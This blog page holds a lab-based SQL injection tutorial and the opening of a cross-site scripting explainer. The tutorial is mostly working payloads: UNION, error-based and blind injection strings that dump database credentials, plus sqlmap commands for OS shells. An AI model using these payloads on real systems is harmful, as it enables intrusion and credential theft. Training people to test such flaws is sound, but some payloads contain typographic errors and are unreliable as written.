-->

ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security,Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Techonology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

Showing posts with label SQL injection. Show all posts
Showing posts with label SQL injection. Show all posts
  • Learn to perform SQLi attacks

     

     

    Learn to perform SQLi attacks

     

     

    SQL Injection


    Learn to perform SQLi attacks in the most effective way!

     

    Introduction & Mindset


    Hello there!

    In this lecture, we are going to explore manual and automatic ways to achieve SQL Injection (SQLi).

     

     

    Picture credit: geekflare.com

     

     

     

    Nowadays, SQLi attacks have become rarer due to rising awareness towards them. Happily, this does not change the fact that there are still a lot of vulnerable web apps that can be exploited using SQLi.

    For practice, you'll need your own Kali Linux machine with default toolset. Burpsuite and sqlmap are mandatory.
    (It's better for you to be familiar with these beforehand)


    I'll try to make theory as detailed as possible, but I would still encourage you to do research on your own and read more upon completing the following tasks. This way you are more likely to understand all the material and will be successful with continuing on your own ;)




    Unit 2 - Basics of SQL language


    Important definitions

    As seen from Wikipedia,


    "A database is an organized collection of data, generally stored and accessed electronically from a computer system." There a lot of different database types such as MySQL, PostgreSQL, and so on.

    SQL by itself is a domain-specific language used in programming for managing databases by reading operating data.




    SQL Crash Course


    In order to understand SQLi, we first need to understand some basics of the SQL language. As far, as SQLi goes, we mainly focus on getting information from the database, this room will give you a basis for that.

    In SQL, in order to choose some data, we use SELECT, FROM, and WHERE. As you might have guessed SELECT allows us to select an object from (FROM) database and choose a specific data using WHERE.



    For example, if we have a database called colors and we want to select all colors from the list, we would use this syntax::



    SELECT * FROM colors;



    Or if you have a database food with different meals followed by calories you could choose all meals with more than 50 calories:



    SELECT * FROM food WHERE calories > 50;


    All in all, if you want a better understanding of SQL I would recommend going through this small interactive course on khanacademy.






     

    Unit 3 - What is SQLi


    A SQL injection attack consists of the injection of a SQL query to the remote web application.

    A successful SQL injection exploit can read sensitive data from the database (usernames & passwords), modify database data (Add/Delete), execute administration operations on the database (such as shutdown the database), and in some cases execute commands on the operating system.


    SQLi injections put server confidentiality under serious risk and can allow bypassing authentication processes or even get access to high-privilege accounts.


    Let’s take a look at this simple PHP input function:



     


     

     

    If we look at the $username variable, under normal operation we might expect the username parameter to be a real username. The function takes a username and chooses data related to it in the users database.


    A malicious user (hacker or pentester) might submit some different kinds of data. For example, what happened if we input '? (Single quote)

    The application would crash because the resulting SQL query is incorrect.





     

    As you see here, inputted " ' " simply creates triple " ' " and produces an error. This error can in fact output some sensitive information or simply give a clue about database structure.




    This will produce a different scenario. 1=1 is treated as true in SQL language and therefore will return us every single row in the table.


    '-- will also do a job here. This payload transforms a username to an empty string to break out of the query and then adds a comment (--) that hides the second single quote making the database return data. We will discuss this more in-depth in Unit 5.





    Unit 4 - How to detect SQLi?


    Manual - PHP parameter


    As we saw in the previous unit, SQL injection is carried out by entering a malicious input to hijack an SQL query. The most common example is abusing a PHP GET parameter (for example $username, or $id) in the URL of a vulnerable web page. Those are usually located in the search fields and login pages, so as a penetration tester, you need to note those down.


    So, now after you got all the PHP GET parameters and login pages you can actually proceed to detecting SQLi. Similarly to the previous unit, we want to cause a certain error displaying at least a small error message (which can even disclose some information, like a database type).


    Let's try that by using SQLi Labs.

    so, as you can see that...browse to hackingtruth.lab/sqli-labs/Less-1/



     


     

    As a hint, it's asking us to "Input the ID as parameter with numeric value" (exactly the PHP GET parameter we are looking for).



    hackingtruth.lab/sqli-labs/Less-1/index.php?id=1



    Giving 1 as id value outputs a standard username and password, but that's not something we are looking for. Let's input apostrophe instead of 1.


    hackingtruth.lab/sqli-labs/Less-1/index.php?id='

     

     


     

     

    Vola! We were able to create an error, therefore, exposing that the id parameter is vulnerable to SQLi! We also were able to see that the error message exposed the database type - MySQL. 

     

     



    Fixing the Query

     


    We need to now fix our query so that we can get rid of the error and pass our malicious SQL query to the database this is done one of two ways, either we comment out the rest of the query or we add some extra characters to the unbalanced query to balance it out.


    In our example, we are going to comment out the rest of the query this can be done using any of these values…



    -- Double Dash
     # Hash
     /*  */ Forward Slash, Star,Star, Forward Slash

     
     

    because we are not directly interacting with the database and instead we are interacting with the web front end and that front end is actually creating the query to interact with the backend so there are some constraints.

    one of the constraints is that when we use — (double dash) to comment out the rest of the query we need to provide an extra space after the double dash. If you don’t it will not fix the query.

    So if we go back to our SQL labs lesson 1 and just add — to the end of our query you will see that we still get an error.


    http://hackingtruth.lab/sqli/Less-1/?id=1'--




    This shows that the comments have not worked as intended, due to not having the space at the end of the double dash also you will get the same error if you actually do a space after the double dash because we are entering it in the URL address bar and you cant have spaces at the end of an address. To get around this you have to URL encode the space for it to work, this for space is %20 try this on your query and you will notice this is now fixed.



    http://hackingtruth.lab/sqli/Less-1/?id=1'--%20






    The same goes for the # (Hash) this will not work until you URL encode the hash and add it to the end of your query. The #(Hash) URL encoded is %23 and this will give you the same output as above.




    http://hackingtruth.lab/sqli/Less-1/?id=1'%23



    So basically all we are doing is commenting out anything after the single quote which closes the string then, in turn, allows us to enter SQL commands which SQL will then run against the database.


    '  '1' -- ' LIMIT 0,1'


    Just to recap any of the values below can be used to comment out and fix your query.


    -- Double Dash is URL encoded as --%20
    --+ Injection This is the same as above but the + on the end just means a space.
    # Hash is URL encoded as %23
    -- - Double Dash space Dash SQL comment
    ;%00 Nullbyte
    ` Backtick





    Find the Number of Columns


    Now we have broken the query and fixed it we are now ready to find out how many columns the Backend database has, This is done by using the order by statement and incrementing the number until you get an error. Start by adding order by 1 to the query as below.


    http://hackingtruth.lab/sqli/Less-1/?id=1′ order by 1–+


    Keep incrementing the number after the order by statement until you get an error


    http://hackingtruth.lab/sqli/Less-1/?id=1′ order by 2–+ ( no error)
    http://hackingtruth.lab/sqli/Less-1/?id=1′ order by 3–+ (no error)
    http://hackingtruth.lab/sqli/Less-1/?id=1′ order by 4–+ (error)





    Find which Columns are Vulnerable


    To find which columns are vulnerable, we have to use a union all select statement with the number of columns we found in the previous section.



    http://hackingtruth.lab/sqli/Less-1/?id=1' union all select 1,2,3--+



    Notice nothing really changes on our test lab as we need to make the statement false to find the vulnerable columns, to do this we have to write something after the = sign which is not in our database



    http://hackingtruth.lab/sqli/Less-1/?id=–1′ union all select 1,2,3–+




    http://hackingtruth.lab/sqli/Less-1/?id=.1' union all select 1,2,3--+
    http://hackingtruth.lab/sqli/Less-1/?id=hempstutorials1' union all select 1,2,3--+
    http://hackingtruth.lab/sqli/Less-1/?id=-lol-1' union all select 1,2,3--+


    As you can see you can write anything after the = sign to get the same result as long as it’s not in the database.

    Let’s just make sure these columns are vulnerable by adding some extra characters this shows that we are able to manipulate what these columns display.



    http://hackingtruth.lab/sqli/Less-1/?id=-1' union all select 1,222,333--+









    Find SQL Version & Database Name


    We can now use our vulnerable columns to find out some juicy information like which Version of SQL the server is running and the name of the database

    To find out the SQL version, we just need to add version() to one of the vulnerable columns like this…


    http://hackingtruth.lab/sqli/Less-1/?id=-lol-1′ union all select 1,version(),333–+





    This tells us we are running SQL 5.7.15 and Ubuntu 0.16.04.1 which, if you followed my tutorial on setting up a vulnerable LAMP server we know in my SQL Labs that I have installed Linux Mint which is based on ubuntu.

    The reason we need to know the version of SQL is that SQL version 4 is very different in the way you do SQL Injections compared to SQL Version 5.  In SQL version 4 you have to guess the table names compared to Version 5 where you manipulate the INFORMATION_SCHEMA to spit out the names of the tables.

    Next to find out the name of the database add database() to the either of the two columns.




    http://hackingtruth.lab/sqli/Less-1/?id=-1' union all select 1,version(),database()--+




    As you can see, I have used column 3 which now displays the name of the database as security.





    Finding Tables


    Now its time to display what tables are in our database called Security. We do this by adding a group_concat command in one of the vulnerable columns that query’s the information _schema and spits out the table names on the website.



    http://hackingtruth.lab/sqli/Less-1/?id=-1' union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+


     

     

     


     



    After you get the names of the tables, it’s time to start extracting the data from these tables. In this example, we will go after the users table as this is where you usually find all the juicy usernames and passwords.



     


    Extract the columns


    We extract the columns by adding column_name in between the brackets of our group_concat command and changing the information_schema to look at the columns.


    http://hackingtruth.lab/sqli/Less-1/?id=-1' union all select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()--+


     

     




     


     

     

     

     

    Dumping Columns


    Now we select what columns we want to dump from our table. For this example, I’m looking for the id, username and password  columns from the users table. To do this we add id,username,password inside the brackets of our group_concat command, then tell it which table we want to dump the data from.


    http://hackingtruth.lab/sqli/Less-1/?id=-1' union all select 1,group_concat(id,username,password),3 from users--+




     


     

     


    So this displays all the usernames and passwords from the users table, the problem is this is not very easy to read.


     

    Formatting the Output



    We can make this more pleasing to read by adding HEX encoded characters and HTML tags to our query.

    The easiest way to do this is by using the HEX Encoding function in the Hackbar firefox addon.

    So say we want to add  colons : between our id, username and password. First open up the Hackbar (F9 if you have it installed but it is not showing) type a : (colon) into the hackbar, highlight it and select



    Encoding -->HEX Encoding --> String to 00ff00ff

     


     

     

     
    This will convert the colon : into a 3a, then add 0x to the front of this and it now can be added to our query like below… Which will add a colon between each username and password it displays .

     



    http://hackingtruth.lab/sqli/Less-1/?id=-1' union all select 1,group_concat(id,username,0x3a,password),3 from users--+



    Also try adding a double colon :: after the id in our query. A double colon encodes to 3a3a using the Hackbar, add 0x to the front of that and we get 0x3a3a which we can add after id



    http://hackingtruth.lab/sqli/Less-1/?id=-1' union all select 1,group_concat(id,0x3a3a,username,0x3a,password),3 from users--+



     

     


     

     




    0x3a = :
    0x3a3a= ::




    you can also encode HTML tags to format the text, in this example I will use a line break <br> to list the output with one line for each record.

    <br> HTML tag encodes with the hackbar to 3c62723e add 0x to  the front of this to get 0x3c62723e and add it before the id in our query.




    http://hackingtruth.lab/sqli-labs/Less-1/index.php?id=' union all select 1,group_concat(0x3c62723e,id,0x3a3a,username,0x3a,password),3 from users--+







     

    <br> = 0x3c62723e  (a line break)



    You can even encode a string using this same process for example HempsTutorials encodes to 48656d70735475746f7269616c7320 add 0x to the front of this and add 0x48656d70735475746f7269616c7320 to the other vulnerable column we are not using. which once processed will display HempsTutorials in our output.





    http://hackingtruth.lab/sqli-labs/Less-1/index.php?id=-1' union all select 1,group_concat(0x3c62723e,id,0x3a3a,username,0x3a,password),

    0x48656d70735475746f7269616c7320 from users--+









    Automatic - Damn Small SQLi Scanner


    Github: https://github.com/stamparm/DSSS

    Quick install: git clone https://github.com/stamparm/DSSS.git && cd DSSS/


    Damn Small SQLi Scanner is an awesome little python script that allows us to check for SQLi vulnerability. Simply provide it with a link to the PHP parameter to run it.


    Main syntax: python3 dsss.py -u "LINK"


    Let's try it on our SQLi labs!

    Simply run the script against hackingtruth.lab/sqli-labs/Less-1/index.php?id= and see what happens.





     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/hackingtruth.lab]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/hackingtruth.lab]
    └─$ git clone https://github.com/stamparm/DSSS.git && cd DSSS/
    Cloning into 'DSSS'...
    remote: Enumerating objects: 366, done.
    remote: Counting objects: 100% (9/9), done.
    remote: Compressing objects: 100% (7/7), done.
    remote: Total 366 (delta 2), reused 8 (delta 2), pack-reused 357
    Receiving objects: 100% (366/366), 66.01 KiB | 472.00 KiB/s, done.
    Resolving deltas: 100% (120/120), done.
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/hackingtruth.lab/DSSS]
    └─$ 
    
    
    

     

     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/hackingtruth.lab/DSSS]
    └─$ python3 dsss.py -u "http://hackingtruth.lab/sqli-labs/Less-1/index.php?id="                                                 130 ⨯
    Damn Small SQLi Scanner (DSSS) < 100 LoC (Lines of Code) #v0.3b
     by: Miroslav Stampar (@stamparm)
    
    * scanning GET parameter 'id'
     (i) GET parameter 'id' appears to be error SQLi vulnerable (MySQL)
     (i) GET parameter 'id' appears to be blind SQLi vulnerable (e.g.: 'http://hackingtruth.lab/sqli-labs/Less-1/index.php?id=1%27%20AND%2070%3D70--%20-')
    
    scan results: possible vulnerabilities found
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/hackingtruth.lab/DSSS]
    └─$ 
    
    
    

     

     

     

    Oh wow! It did not only detect the vulnerability but provided us with the database type and suggested possible exploitation types.
    That is definitely a good tool and I highly recommend using it!




    Automatic - suIP.biz

    Link: https://suip.biz/?act=sqlmap



    This is an online sqlmap powered tool that allows you to perform a fast SQLi check. Unfortunately, we cannot run it against our machine but this tool can be really handy in the real-world tests

    Note: If really want to test this (or some other SQLi tools) with SQLi labs, it is possible to host the labs on Heroku or any other server provider (find an installation link in Unit 9).



     




    Unit 5 - Error Based SQLi


    Definition


    Error-based SQLi is a SQL Injection technique that relies on error messages which are used to retrieve any sensitive information. In some cases, error-based SQL injection alone is enough for an attacker to enumerate an entire database.



    Approach


    So, as seen from the definition, we actually want to create a SQL error, displaying some sensitive content. As you might have seen in Unit 4, we were able to get the database type by creating an error. Now we need to go beyond that and get something more interesting.

    Of course, to make your life easier, at this point you would actually fuzz the SQL vulnerable link with a wordlist and most likely get the desired result. But for the purpose of this room, we are going to actually see how manually develop the payload using the understanding of SQL language. I have linked some useful payload lists and blogs in Unit 9 so you can practice fuzzing.


    Manual exploitation - SQLi Labs Lesson 1


    Browse to lesson 1 on the sqli labs machine and include the id=1 parameter just like we did in the previous unit.


     


     

     



    When we put the id parameter as some value, we instantly get a Login name and password. Let's think of that in terms of SQL language.

    This id parameter is attached to a certain username (login name) and password which are being chosen from the database.



    This how it would look in terms of SQL language:

    select login_name, password from table where id=




    See, just by looking at the basic output, we were able to retrieve some common SQL patterns. Now, as a part of error-based SQLi, we can exploit it.



    Note here: Try inputting something other than numbers and see what happens. Also, try inputting some big numbers. Think about it and ask yourself if it tells us about anything.

    Now try inputting 1' as the id parameter and let's analyze the error closely.



    syntax to use near ''1'' LIMIT 0,1' at line 1


    We can see that the web app is producing an error due to four single quotes around the 1


    As in Unit 3, we can understand that error as 'one extra' single quote which cannot be recognized by the system.




    What do I mean by that? Well, in this case when the application is taking the id input, it is putting it between two single quotes like so:

    ' 1 '


    But when we input 1' we produce this scenario:

    ' 1' '

    We are, in a way, closing the first single quote, at the same time creating the third. This, later on, makes the system automatically close the third one, displaying syntax to use near ''1''error.

    If you are still a bit confused about this, let's take a bit different approach.
    Try inputting 1\ as the id value. This also produces an error with '1\', clearly showing that the id value is placed between single quotes.

    What we can do about it?
    Well, if we can close the single quotes that easily, it means that we are able to break out of the query and provide custom commands.

    If you try putting AND 1=1 (which corresponds to true) after the single quote, we still get this error.
     

    In order to get around that, we need to fix the query back. It's done by commenting out the rest by using -- and providing + as the blank space at the end.
    The URI should look like this


    hackingtruth.lab/sqli-labs/Less-1/index.php?id=1' AND 1=1 --+


     

     

     


     

     

    Wonderful! The web application is displaying us content even though we injected some custom SQL code which should not be available for us.


     

     


     

     

     

    So, to sum up, in error-based SQLi injection, we first, need to find a link or input form where we can create an error. Then, by inputting random things like single and double quotes, slashes, and backslashes we need to understand the common pattern and figure out the basic structure of SQL query. After that simply abuse your acquired knowledge to exploit the app and get what you wanted.



    A small payload collection can be found here:

    https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads

     
     

     



    Unit 6 - Boolean based SQLi


    Definition


    Boolean-based SQL Injection relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query gave a TRUE or FALSE result. Depending on the result, the content of the HTTP response will change, or remain the same (Change in HTTP response usually stands for a FALSE response, while TRUE does not affect anything). This allows an attacker to understand if the payload used returned true or false, even though no data from the database is returned.




    Approach


    The boolean based sqli is usually carried out in a blind situation. Blind, in this case, means that there's no actual output and that we cannot see any error message (like we did previously).



    Blind query breaking - SQLi Labs Lesson 8



    Browse to 10.10.13.253/sqli-labs/Less-8/?id= and let's take a look.
    Inputting single or a double quote doesn't produce any result, same as slashes. This gives us the idea of the blindness of our sql injection (or even absence of vulnerability at all). In this situation, we'll have to practically guess the query and exploit the database right away.



    Make the id parameter equal to 1. We now see a message:
    You are in...........



    Now, let's blindly assume that the same as in the previous unit, putting 1' as the id value would produce some error.


    hackingtruth.lab/sqli-labs/Less-8/?id=1'



    And it did! We didn't see the error message but the message disappeared meaning that we were actually able to produce some sort of error. Now, fix the query by putting --+


    hackingtruth.lab/sqli-labs/Less-8/?id=1' --+



    Wonderful! The message is back. See what happened here, even though we are not able to see any SQL output, by making some simple assumption we were able to find a similar pattern as in the previous unit.


    But the difference is that boolean sqli relies on the concept of True-False relation. Let's see how it works here. 


    Put OR 1 in the link like so: 10.10.13.253/sqli-labs/Less-8/?id=1' OR 1 --+, representing the True value. 


    We still see the message.


    Putting OR 0 won't logically display the message directly proving our ability to perform an SQL injection attack




    Exploitation


    Well, now as we can only return True (You are in...........) or False (no message) statements, we need to start playing the game of yes-no with the database. By asking 'questions' about the database length and table quantity we can dump and enumerate the database.


    At this point, it is important to understand that in SQL language we can actually use =, <, > to compare the values.

    Try putting different comparison values in your link


    hackingtruth.lab/sqli-labs/Less-8/?id=1' OR 1 < 2 --+ = True


    or


    hackingtruth.lab/sqli-labs/Less-8/?id=1' OR 1 > 2 --+ = False

    This comparison can be actually helpful for us in asking those 'questions'.



    For this particular room let's try to get the database's name using blind sql injection.


    In sql language, there's a really useful function called SUBSTR() which extracts a substring from a string (starting at any position).
    It takes 3 input values:
    1. Operated text (in our case database name)
    2. Character to start with
    3. Number of characters to extract



    For example, running SELECT SUBSTR("Strange Fox", 5, 3) will return us nge.




    Then, our SQLi payload would look like that:


    AND (substr((select database()),1,1)) - this will return us the first character of the database name.



    Now, what we need to do is literally guess the character by trying to compare that payload to some letters.
    Theoretically, the payload would look like that



    1' substr((select database()),1,1)) = s --+




    Happily for us, there's a way to avoid using characters and actually speed things up (instead of fuzzing the whole alphabet). If we add ascii() function before the payload, we'll be able to compare it to ascii character values.


    hackingtruth.lab/sqli-labs/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) = 115 --+



    This will once again return us You are in........... because s letter corresponds to 115 in ASCII.


    Of course, in the real world we cannot simply guess that so we need to use > and < operators to compare the value of the characters to their ASCII values.



    Now try guessing the second letter using the comparison technique.




    Hint:

    hackingtruth.lab/sqli-labs/Less-8/?id=1' AND (ascii(substr((select database()),2,1))) < 115 --+

     

     

    HACKING TRUTH
    Provided by COMPARITECH

     



    Unit 7 - Union Based SQLi

    Definition

    Union-based SQLi is a SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result which is then returned as part of the HTTP response.


    Approach


    The UNION keyword lets you execute one or more additional SELECT queries and append the results to the original query. For example:


    SELECT 1, 2 FROM usernames UNION SELECT 1, 2 FROM passwords


    This SQL query will return a single result taken from 2 columns: first and second positions from usernames and passwords.


    UNION SQLi attack consists of 3 stages:

    1. You need to determine the number of columns you can retrieve.
    2. You make sure that the columns you found are in a suitable format
    3. Attack and get some interesting data.

    > Determining the number of columns required in an SQL injection UNION attack



    There are exactly two ways to detect one:

    The first one involves injecting a series of ORDER BY queries until an error occurs. For example:


    ' ORDER BY 1--
    ' ORDER BY 2--
    ' ORDER BY 3--
    # and so on until an error occurs



    (The last value before the error would indicate the number of columns.)



    The second one (most effective in my opinion), would involve submitting a series of UNION SELECT payloads with a number of NULL values:


    ' UNION SELECT NULL--
    ' UNION SELECT NULL,NULL--
    ' UNION SELECT NULL,NULL,NULL--
    # until the error occurs



    No error = number of NULL matches the number of columns.


    > Finding columns with a useful data type in an SQL injection UNION attack


    Generally, the interesting data that you want to retrieve will be in string form. Having already determined the number of required columns, (for example 4) you can probe each column to test whether it can hold string data by replacing one of the UNION SELECT payloads with a string value. In case of 4 you would submit:



    ' UNION SELECT 'a',NULL,NULL,NULL--
    ' UNION SELECT NULL,'a',NULL,NULL--
    ' UNION SELECT NULL,NULL,'a',NULL--
    ' UNION SELECT NULL,NULL,NULL,'a'--



     



    No error = data type is useful for us (string).

    > Using an SQL injection UNION attack to retrieve interesting data

    When you have determined the number of columns and found which columns can hold string data, you can finally start retrieving interesting data.


    Suppose that:

    * The first two steps showed exactly two existing columns with the useful datatype.
    * The database contains a table called users with the columns username and password.
        (This can be figured out by using the boolean technique from Unit 6)


    In this situation, you can retrieve the contents of the user's table by submitting the input:



    ' UNION SELECT username, password FROM users --



     


    First, i browse to hackintruth.lab:3000/resetdb.php to set up the database.
     
     
    Then, go to hackingtruth.lab:3000/register.php and register a new account. Make sure you input something interesting, as you'll be able to interact with that data later on! (Question 4)


    Now let's proceed to the main objective - exploiting the web app. A vulnerable search field is located at
     
    hackingtruth.lab:3000/searchproducts.php










    Let's start our exploitation process!

    As you might remember, we, first, need to determine the number of available columns by inputting a series of
    ' UNION SELECT NULL -- into the search field.


    To spice things up, I've configured the database to also throw an error when having a -- at the end. To bypass that, we need to include an additional comment after the --. You can use either // or /* do bypass that configuration.


     

     


     

     

     

    As you can see on the screenshot above, a single NULL value causes an error, meaning that there are more columns. Try inputting NULL values until you finally get the number. Note it down to answer the questions later on.

    Now, try inputting 'a' instead of random NULL values and see if there's an error. An error will indicate that the given column format is not suitable for us and cannot be exploited.


    NULL,NULL,NULL,'a' -- //

     

     



     


    Finally, we can start getting some valuable information. Simply replace some null values with SQL keywords to get information about the database.
    Here's a small list of thing you'd want to retrieve:
    1. database()
    2. user()
    3. @@version
    4. username
    5. password
    6. table_name
    7. column_name


    Let's try this

    1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- -

     

     


     

     

    ' UNION SELECT * FROM users -- //

     

     


     

     

     

    Now, next step is to extract some more information from the database, and Union query is a great way of doing that.

    I supply, whoiskumaratul' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--


    which gives me no. of exact columns. As we can see, the no. of NULLs above is 8 so the table has 8 nos of columns. Anything less than 8 don't produce any error and anything above than 8 produces error. So, that way we can determine that the no. of columns are 8. Another way of doing that is executing  ' ORDER BY query.

    Start by 'ORDER BY 1 till you get error and the no. before you get error is no. of the columns. So, supplying 'ORDER BY 9 gave error, so the no. is 8.

     

     


     

     

     


    Next step is to know the datatype of the columns. The query

    ' UNION SELECT 'a',NULL,NULL,NULL,NULL,NULL,NULL,NULL--  



    which gives me error as 'conversion failed....data type int' so the first column is int. Similarly we can keep trying to replace each NULL in above query to know the datatypes of each column. Another example,


    ' UNION SELECT NULL,'a',NULL,NULL,NULL,NULL,NULL,NULL--  


    doesn't produce any error, so string datatype, so- forth, so-on.



    Now more queries can be executed:


    ' UNION SELECT @@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL--                /*version info*/

     

    ' UNION SELECT database(),NULL,NULL,NULL,NULL,NULL,NULL,NULL--                /*version info*/

     

    ' UNION SELECT user(),NULL,NULL,NULL,NULL,NULL,NULL,NULL--                /*version info*/

     

    ' union select null, id, username, password, fname from users -- //

     

     


     

     

     


    Automating exploitation


    SQLmap

    Project link: http://sqlmap.org/
    Github: https://github.com/sqlmapproject/sqlmap


    sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.


    sqlmap is truly an awesome tool that can be extremely handy for us. Even though it is not allowed to use it during the OSCP exam, nothing restricts us from using it for our pen-tests and tryhackme rooms.


    Quick install:

    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

    Print out the help page by running sqlmap --help and can take a closer look.






     



    Pure sqlmap

    Table of the most important switches

     

     

     

     

    Settings Enumeration OS interaction Additional
    --url (-u)

    Set the target URL
    --dump

    --dump-all

    Dump (retrieve) DBMS database
    --os-shell

    Prompt for an interactive operating system shell
    --batch

    Never ask for user input, use the default behavior
    --dbms

    Provide back-end DBMS to exploit (i.e MySQL, PostgreSQL)
    --passwords

    Enumerate DBMS users password hashes
    --os-pwn

    Prompt for an OOB shell, Meterpreter or VNC
    --wizard

    Simple wizard interface for beginner users
    --level=LEVEL

    Level of tests to perform (1-5)

    --risk=RISK

    Risk of tests to perform (1-3)
    --all

    Retrieve everything
       

     

     

     

     

     

     
    Command examples:

    https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet


    All-in-one cheat sheet:


    https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/



    Now, when we are a bit more familiar with sqlmap let's practice using it.
    Go back to sqli labs lesson 1 and input the link to sqlmap.


    sqlmap --url "hackingtruth.lab/sqli-labs/Less-1/index.php?id=" --batch



     


    Oh wow! sqlmap has fetched all information for us! DB type, possible injection type, and even got us OS information.

    Now go ahead and play around with the tool, try dumping the database, or simply enumerating it.



    Burpsuite + sqlmap


    sqlmap has a really awesome feature that allows us to automatically process and exploit requests taken from Burpsuite.

    Go ahead and configure burp suite to work properly. (If you are not sure how to use Burpsuite, take a step back and see this article )

     

     

     

     


     

    HERE - CLICK HERE

     

     


     

     


    Check that you have caught a request similar to the screenshot above.
    Right-click on the request and choose 'Save item'. Now when we have a saved request let's go ahead and connect sqlmap here.


    Go to the request location (where you saved it) and open up a terminal.

    type sqlmap -r {request} --batch (replace {request} with your file name).





     

     

     
    We got the same output as before! See how easy it actually was.
    As a piece of advice, I'd definitely use the request feature when SQL injecting login pages as sqlmap automatically check all possible parameters (username, password).



    1) How would you get an OS shell on website "hackingtruth.lab/login.php"? (URL switch comes first)

    Ans :- sqlmap -u "sqli.thm/login.php" --os-shell




    2) What about listing all databases on the same website? (URL switch comes first)

    Ans :- sqlmap -u "sqli.thm/login.php" --dbs


     

     

    https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet


    All-in-one cheat sheet:

     
    https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/


     

    Unit 9 - Resources & What's next?


    Congratulations! we have successfully gone through the major part of SQLi. Now, with all that knowledge it won't take long for you to pick up on small tricks and tactics by reading and researching more. I have attached a some further SQLi resources for you to explore. Enjoy!


    Good luck with your studies!


     

    Payload Lists:

    1. https://github.com/payloadbox/sql-injection-payload-list
    2. https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection



     

     

    Guides & Blogs:

    1. https://www.sqlinjection.net/
    2. http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
    3. https://github.com/trietptm/SQL-Injection-Payloads
    4. https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet
    5. https://resources.infosecinstitute.com/dumping-a-database-using-sql-injection/
    (Special thanks to TheMayor for linking the last one)


     

     

    Labs and practice:

    1. https://portswigger.net/web-security/sql-injection
    2. https://github.com/Audi-1/sqli-labs
    3. https://github.com/appsecco/sqlinjection-training-app
    4. https://tryhackme.com/room/gamezone
    5. https://tryhackme.com/room/avengers
    6. https://tryhackme.com/room/uopeasy
    7. https://tryhackme.com/room/jurassicpark




     


    Disclaimer

     

    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)

     

     

  • Background concept about cross site scripting with examples







    Background Concept About Cross Site Scripting ( XSS ) With Examples



    Now we are going to talk about XSS cross site scripting. XSS Vulnerabilities are among the most wide spread wab application vulnerabilities on the internet. 


    Cross-site-scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicous code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur antwhere a web application uses input from a user within the output  it generates without validating or encoding it. Background concept about cross site scripting with examples



    An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browsers has no way to kmow that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens or, other sensitive information retined by the browser and used with that site. cross site scripting with examples



